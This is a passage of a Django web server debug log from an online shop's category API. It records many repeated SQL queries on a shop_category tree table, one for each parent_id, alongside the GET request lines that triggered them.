140297243715328 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) [27/Dec/2019 09:30:59] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-27 09:30:59,787 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:30:59,791 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:30:59,795 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:30:59,801 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:30:59,805 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:30:59,809 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:30:59,813 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:30:59,817 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:30:59,823 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:30:59,827 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:30:59,831 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:30:59,835 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:30:59,839 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:30:59,843 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:30:59,849 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:30:59,853 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:30:59,857 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:30:59,861 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:30:59,865 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:30:59,871 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:30:59,875 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:30:59,879 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:30:59,883 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:30:59,887 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:30:59,894 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:30:59,898 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:30:59,902 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:30:59,906 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:30:59,910 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:30:59,914 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:30:59,920 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:30:59,924 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:30:59,928 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:30:59,933 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:30:59,937 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:30:59] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 09:31:00,268 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:31:00,276 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:31:00,281 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:31:00,283 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:31:00,287 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:31:00,290 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:31:00,292 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:31:00,294 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:31:00,296 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:31:00,300 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:31:00,302 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:31:00,304 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:31:00,306 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:31:00,309 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:31:00,312 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:31:00,315 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:31:00,317 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:31:00,319 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:31:00,321 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:31:00,325 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:31:00,329 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:31:00,333 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:31:00,335 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:31:00,338 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:31:00,341 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:31:00,345 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:31:00,348 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:31:00,350 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:31:00,353 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:31:00,355 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:31:00,360 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:31:00,362 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 